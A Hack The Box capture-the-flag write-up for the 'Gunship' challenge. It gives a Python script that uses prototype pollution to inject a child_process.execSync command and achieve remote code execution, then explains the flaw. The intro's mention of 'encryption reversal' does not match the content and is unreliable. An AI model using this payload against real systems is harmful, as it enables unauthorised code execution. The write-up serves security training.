HackTheBox Gunship Writeup
Explore the basics of cybersecurity in the Gunship Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/245
Description
A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
import sys
def get_base_url():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <ip:port>")
sys.exit(1)
host, port = sys.argv[1].split(':')
return f"http://{host}:{port}/"
TARGET_URL = get_base_url()
r = requests.post(TARGET_URL+'/api/submit', json = {
"artist.name":"Gingell",
"__proto__.block": {
"type": "Text",
"line":
"console.log(process.mainModule.require('child_process').execSync('cat flag* > /app/static/out').toString())"
}
})
print(r.status_code)
print(r.text)
print(requests.get(TARGET_URL+'/static/out').text)
Summary
Gunship is a very-easy-level challenge on Hack The Box that exploits prototype pollution to achieve remote code execution (RCE). By crafting a malicious payload and submitting it via the /api/submit endpoint, the challenge injects JavaScript into the server’s execution flow, allowing arbitrary commands to run.
The payload uses child_process.execSync to read the flag file and write it to a publicly accessible location (/app/static/out). The flag is then retrieved through a simple GET request to the exposed file. This challenge highlights the dangers of prototype pollution and improper handling of untrusted input in server-side applications.